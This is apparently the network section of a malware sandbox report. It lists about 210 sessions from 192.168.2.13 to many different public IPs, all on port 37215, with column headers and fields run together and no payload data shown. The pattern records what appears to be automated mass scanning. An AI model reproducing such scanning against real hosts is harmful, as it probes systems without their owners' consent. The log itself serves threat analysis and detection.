                                                  14593192.168.2.1345974174.115.62.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14594192.168.2.1355684157.106.245.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14595192.168.2.135560841.128.168.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14596192.168.2.133987841.80.174.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14597192.168.2.1353678197.21.244.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14598192.168.2.1349998116.43.176.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14599192.168.2.135404241.139.103.637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14600192.168.2.1340132162.169.112.9837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14601192.168.2.135335489.177.178.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14602192.168.2.1352444197.144.195.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14603192.168.2.1346880221.205.123.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14604192.168.2.1345038197.198.180.19537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14605192.168.2.136099441.222.15.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14606192.168.2.134511441.24.19.9237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14607192.168.2.1340994197.224.250.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14608192.168.2.1352256157.209.250.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14609192.168.2.1333912157.73.43.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14610192.168.2.133621841.176.95.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14611192.168.2.1350938157.104.118.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14612192.168.2.1352054197.125.160.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14613192.168.2.134052041.39.178.15237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14614192.168.2.135000041.218.183.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14615192.168.2.1344024197.206.96.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14616192.168.2.1351892197.63.3.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14617192.168.2.133516041.46.130.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14618192.168.2.135215441.87.179.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14619192.168.2.134039641.202.204.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14620192.168.2.1344932197.134.177.18037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14621192.168.2.13573504.80.238.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14622192.168.2.135393263.50.199.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14623192.168.2.1345106197.144.34.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14624192.168.2.1338924197.169.234.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14625192.168.2.133946041.105.186.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14626192.168.2.1341464197.217.138.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14627192.168.2.1360632197.100.60.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14628192.168.2.1350510157.73.167.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14629192.168.2.1355230197.102.252.19737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14630192.168.2.133849441.44.95.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14631192.168.2.1336040197.111.158.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14632192.168.2.1335034197.18.17.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14633192.168.2.1337156197.170.18.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14634192.168.2.134255041.163.232.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14635192.168.2.1344024197.203.158.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14636192.168.2.1342522178.245.131.2237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14637192.168.2.136010224.91.169.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14638192.168.2.1359318157.15.43.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14639192.168.2.1349572197.195.110.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14640192.168.2.134632231.136.148.9237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14641192.168.2.134184441.89.232.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14642192.168.2.1359308157.227.179.13337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14643192.168.2.13355541.146.130.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14644192.168.2.134513841.248.9.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14645192.168.2.134200212.93.129.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14646192.168.2.1345962197.79.87.2437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14647192.168.2.133299041.70.97.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14648192.168.2.1359490142.228.146.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14649192.168.2.135352041.214.6.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14650192.168.2.1341258170.195.24.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14651192.168.2.133809041.14.203.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14652192.168.2.134453641.185.110.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14653192.168.2.134505441.64.240.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14654192.168.2.1336566157.44.155.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14655192.168.2.1358950197.181.112.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14656192.168.2.1360446197.171.85.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14657192.168.2.1352406148.160.148.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14658192.168.2.1339040157.150.35.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14659192.168.2.1347288197.40.195.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14660192.168.2.1358414197.240.233.10837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14661192.168.2.1350856197.69.107.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14662192.168.2.1359052157.62.166.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14663192.168.2.1333902157.155.91.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14664192.168.2.1336066157.208.171.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14665192.168.2.1359772168.121.174.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14666192.168.2.1353692157.82.43.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14667192.168.2.1348628153.173.2.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14668192.168.2.13498805.156.85.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14669192.168.2.1345188197.48.156.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14670192.168.2.1332834154.38.33.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14671192.168.2.1335710197.100.92.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14672192.168.2.134533274.213.218.22337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14673192.168.2.135704691.74.154.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14674192.168.2.1335302157.213.51.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14675192.168.2.1335582157.166.25.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14676192.168.2.1356414157.239.148.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14677192.168.2.1336852204.106.13.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14678192.168.2.134358241.84.93.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14679192.168.2.1342794220.238.160.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14680192.168.2.134306641.255.95.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14681192.168.2.135418041.191.45.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14682192.168.2.134056641.93.43.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14683192.168.2.133987878.230.94.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14684192.168.2.1360000197.164.60.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14685192.168.2.1337522197.94.82.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14686192.168.2.1345622157.136.13.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14687192.168.2.1337584197.83.4.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14688192.168.2.13342908.41.80.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14689192.168.2.1342036157.178.240.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14690192.168.2.134610441.214.207.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14691192.168.2.135368841.180.112.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14692192.168.2.13486909.62.115.8337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14693192.168.2.1349624197.54.132.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14694192.168.2.134572441.234.147.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14695192.168.2.135918041.229.25.15237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14696192.168.2.133801841.153.149.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14697192.168.2.1351040157.106.255.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14698192.168.2.1353754157.126.143.18037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14699192.168.2.1334964197.187.113.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14700192.168.2.1343334197.8.240.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14701192.168.2.1335696197.119.176.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14702192.168.2.1352372197.23.161.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14703192.168.2.1355816157.156.22.11637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14704192.168.2.1337486197.146.203.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14705192.168.2.1355726194.0.182.8137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14706192.168.2.133438041.11.111.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14707192.168.2.134936241.204.76.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14708192.168.2.1352600157.77.46.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14709192.168.2.1337656157.152.84.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14710192.168.2.1351678197.186.73.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14711192.168.2.1350022157.10.109.18037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14712192.168.2.1337474157.135.183.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14713192.168.2.134036841.105.178.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14714192.168.2.1356666197.56.246.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14715192.168.2.1360888157.170.73.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14716192.168.2.1356520197.86.121.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14717192.168.2.1335196197.74.243.6237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14718192.168.2.133584441.226.45.24937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14719192.168.2.1341646157.183.165.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14720192.168.2.1358070192.42.214.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14721192.168.2.134673241.139.177.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14722192.168.2.1340212197.56.162.9237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14723192.168.2.1355902197.27.178.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14724192.168.2.1340490197.137.54.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14725192.168.2.1344602157.165.118.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14726192.168.2.1348540157.12.168.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14727192.168.2.134531841.233.32.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14728192.168.2.1352612197.138.116.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14729192.168.2.1357424197.122.227.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14730192.168.2.134545641.58.47.8837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14731192.168.2.1334848197.137.172.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14732192.168.2.1357610157.4.4.4237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14733192.168.2.133920038.174.248.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14734192.168.2.135149241.134.96.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14735192.168.2.13561722.213.109.13337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14736192.168.2.1356680157.219.121.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14737192.168.2.134230841.13.152.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14738192.168.2.133893218.120.36.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14739192.168.2.135650488.92.207.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14740192.168.2.1336692176.137.120.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14741192.168.2.133609441.142.18.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14742192.168.2.1346324197.225.187.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14743192.168.2.1358558197.219.63.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14744192.168.2.1359436197.14.204.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14745192.168.2.134543441.111.43.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14746192.168.2.134849097.223.238.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14747192.168.2.135079078.57.153.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14748192.168.2.135833441.119.73.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14749192.168.2.1356216157.29.121.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14750192.168.2.1342938157.18.70.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14751192.168.2.1350724197.70.187.20337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14752192.168.2.13424362.12.40.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14753192.168.2.1340746157.68.108.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14754192.168.2.1353474132.245.189.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14755192.168.2.135893841.229.217.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14756192.168.2.1352304197.164.180.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14757192.168.2.1342064197.121.106.13137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14758192.168.2.1351182157.60.2.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14759192.168.2.135934641.156.77.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14760192.168.2.1351210157.168.10.6237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14761192.168.2.136046259.195.57.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14762192.168.2.135310441.68.3.15237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14763192.168.2.1357442149.230.189.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14764192.168.2.135426841.236.78.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14765192.168.2.1340174197.186.250.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14766192.168.2.1354336202.52.129.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14767192.168.2.1346364196.117.215.5137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14768192.168.2.134580661.131.216.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14769192.168.2.1342364169.223.166.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14770192.168.2.1333406164.0.207.22337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14771192.168.2.1346326197.191.109.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14772192.168.2.1343008136.229.224.2237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14773192.168.2.1358368157.9.151.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14774192.168.2.1352690157.2.183.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14775192.168.2.135407041.104.2.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14776192.168.2.1352256197.224.55.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14777192.168.2.1339140197.68.125.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14778192.168.2.1353730197.65.78.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14779192.168.2.1343666197.192.157.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14780192.168.2.133559841.205.187.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14781192.168.2.1348306197.87.193.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14782192.168.2.1360826197.12.19.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14783192.168.2.1355592157.127.56.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14784192.168.2.1338434157.212.146.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14785192.168.2.133406441.157.118.6237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14786192.168.2.133323841.148.177.7337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14787192.168.2.135865284.159.28.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14788192.168.2.1348174157.60.2.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14789192.168.2.1355032197.31.239.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14790192.168.2.1350640197.85.241.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14791192.168.2.1353342157.140.173.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14792192.168.2.1338640157.20.230.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14793192.168.2.1347820157.243.138.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14794192.168.2.134788441.22.11.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14795192.168.2.1354574157.151.206.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14796192.168.2.1358640157.193.25.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14797192.168.2.135218241.56.4.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14798192.168.2.135858841.85.237.2237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14799192.168.2.133331441.127.86.5137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14800192.168.2.133364441.136.100.1237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14801192.168.2.1339262157.205.42.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14802192.168.2.133895841.47.110.2037215
